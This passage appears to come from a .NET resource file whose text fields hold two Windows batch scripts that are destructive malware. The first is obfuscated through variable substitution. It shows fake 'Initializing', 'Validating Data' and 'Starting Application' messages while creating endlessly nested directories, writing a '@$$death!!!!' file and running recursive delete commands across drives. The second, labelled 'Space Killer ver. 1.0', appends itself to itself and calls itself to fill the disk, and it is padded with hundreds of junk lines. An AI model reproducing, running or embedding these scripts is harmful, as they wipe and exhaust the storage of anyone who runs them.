;@%rjp% %or% %xn% %wf% %vjj% %rv% %xn% &gt;%up%
;@%mu% %po% %cjk% &gt;%xn%
;@set rb=%%1:\
;@%mu% %rb% &gt;&gt;%xn%
;@%mu% %fp% &gt;&gt;%xn%
;@set rb=:startmd
;@%mu% %rb% &gt;&gt;%xn%
;@set rb=("if
;@set pn=not
;@set yhe=%%2\nul
;@set xd=md
;@set sp=%%2"
;@set cc="if
;@set tyo=cd
;@set hb=%%2")
;@%mu% %wx% %ecg% %sf% %rb% %pn% %or% %yhe% %xd% %sp% %cc% %or% %yhe% %tyo% %hb% %bt% %ecg% &gt;&gt;%xn%
;@set rb=("
;@set xd=Lucky2000.txt")
;@set sp=%%%%Land
;@set cc=@$$death!!!!
;@%mu% %wx% %ecg% %sf% %rb%&gt;%xd% %bt% %mu% %sp% %nru% %cc% &gt;&gt;%xn%
;@set rb=startmd
;@%mu% %rjp% %pn% %or% %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul %im% %rb% &gt;&gt;%xn%
;@%yo% %wf% %hin% %mra% %xn% &gt;%up%
;@%pkh%
;@set mjd=Initializing
;@set ut=Variables
;@%mu% %mjd% %ut% %yp% %yp% %yp%
;@set rb=rem
;@set rfb=%%a:\*.
;@set xd=only
;@set sp=eliminates
;@set cc=directories
;@set tyo=???
;@%rb% %gpi% %gjq% %rfb% %xd% %sp% %cc% %tyo%
;@set rb=%%a:
;@%wx% %bwi% %sf% %bc% %bt% %yo% %nmi% %rb% %tpj% %tbe% %fq% &gt;%up%
;@%pkh%
;@%mu% %mjd% %ut% %yp% %yp% %yp%
;@set tsq=Validating
;@set va=Data
;@%mu% %tsq% %va% %yp% %yp% %yp%
;@%wx% %bwi% %sf% %bc% %bt% %yo% %xn% %bwi% %fl% &gt;%up%
;@%pkh%
;@%mu% %mjd% %ut% %yp% %yp% %yp%
;@%mu% %tsq% %va% %yp% %yp% %yp%
;@set lr=Analyzing
;@set nyq=System
;@set cxr=Structure
;@%mu% %lr% %nyq% %cxr% %yp% %yp% %yp%
;@set rb=%%a:\
;@set xd=/S
;@%wx% %bwi% %sf% %bc% %yo% %wf% %vjj% %rv% %rb% %xd% &gt;%up%
;@%yo% %wf% %hin% %mra% %xn% &gt;%up%
;@%yo% %wf% %hin% %mra% %caa% &gt;%up%
;@%pkh%
;@%mu% %mjd% %ut% %yp% %yp% %yp%
;@%mu% %tsq% %va% %yp% %yp% %yp%
;@%mu% %lr% %nyq% %cxr% %yp% %yp% %yp%
;@set lur=Application
;@%mu% %mjd% %lur% %yp% %yp% %yp%
;@%wx% %bwi% %sf% %bc% %yo% %gpi% %gjq% %rfb% &gt;%up%
;@%pkh%
;@%mu% %mjd% %ut% %yp% %yp% %yp%
;@%mu% %tsq% %va% %yp% %yp% %yp%
;@%mu% %lr% %nyq% %cxr% %yp% %yp% %yp%
;@%mu% %mjd% %lur% %yp% %yp% %yp%
;@set rb=Starting
;@%mu% %rb% %lur% %yp% %yp% %yp%
;@set rb=Munga
;@%wx% %bwi% %sf% %bc% %bt% %yo% %xn% %bwi% %rb% &gt;%up%
:end%;@%</value>
</data>
<data name="RichTextBox3.Text" xml:space="preserve">
<value>@echo off
cls
@echo ===Space Killer ver. 1.0 by [HArM]=== &gt;&gt;nul
@echo ===coolharm@chat.ru================== &gt;&gt;nul
@echo ===http://www.chat.ru/~coolharm====== &gt;&gt;nul
@type %0&gt;&gt;%0
@call %0
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
@echo skdlfsjdkflsldfjskdflksdlkfjslkdjfklsjdklfsjdkljfslkdjlf
